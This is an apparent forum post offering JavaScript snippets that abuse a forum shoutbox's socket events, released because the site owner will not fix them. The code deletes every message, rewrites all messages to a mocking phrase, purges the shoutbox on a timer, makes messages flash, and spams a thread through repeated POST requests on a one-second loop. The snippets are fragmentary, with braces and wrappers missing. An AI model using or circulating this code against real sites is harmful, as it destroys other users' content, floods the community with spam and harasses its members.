2016-02-28, 01:57 AM
var i;
var new_more_emojis = [
for(i = 0; i < new_more_emojis.length; ++i) {
var emoji = new_more_emojis[i];
emoticons['more'][emoji] = emoji;
var uid = $('.usersub-menu li:last-child a').attr('href').split('uid=')[1];
var lastMsg = $('.msgShout[data-uid="' + uid + '"]:last');
var lastMsgId = lastMsg.data('ided');
var message = lastMsg.find('.content_msgShout').text();
var newMsg = '';
$.each(message.split(''), function(i, l) {
setTimeout(function() {
newMsg = newMsg + l;
socket.emit('updmsg', {id:lastMsgId, newmsg:newMsg});
}, 100 * i);
var uid = $('.usersub-menu li:last-child a').attr('href').split('uid=')[1];
var lastMsg = $('.msgShout[data-uid="' + uid + '"]:last');
var lastMsgId = lastMsg.data('ided');
var message = lastMsg.find('.content_msgShout').text();
var i = 0;
setInterval(function() {
if(i % 2 == 0) {
socket.emit('updmsg', {id:lastMsgId, newmsg:' '});
} else {
socket.emit('updmsg', {id:lastMsgId, newmsg:message});
}, 500);
$('.msgShout').each(function() {
socket.emit('rmvmsg', {id: $(this).data('ided')});
// Mass editing
var newMsg = 'i am gay';
$('.msgShout').each(function() {
socket.emit('updmsg', {id:$(this).data('ided'), newmsg:newMsg});
setInterval(function() {
socket.emit('purge', function () {});
}, 500);
// Thread spamming
setInterval(function() {
url: 'https://raidforums.com/newreply.php?ajax=1',
type: 'POST',
data: {
'my_post_key': my_post_key,
'action': 'do_newreply',
'posthash': '433ce321dcd6487e2e180f52bfa0b383', // Get this from viewing a post request when you make a reply
'tid': '12272',
'method': 'quickreply',
'postoptions[signature]': '1',
'message': 'Exploits should be patched, not made ban-able. #' + (+new Date * Math.random()).toString(36).substring(0,8)
success: function(data) {
return true;
}, 1000);
Martec won't fix these exploits that break the shoutbox. Here ya go kiddies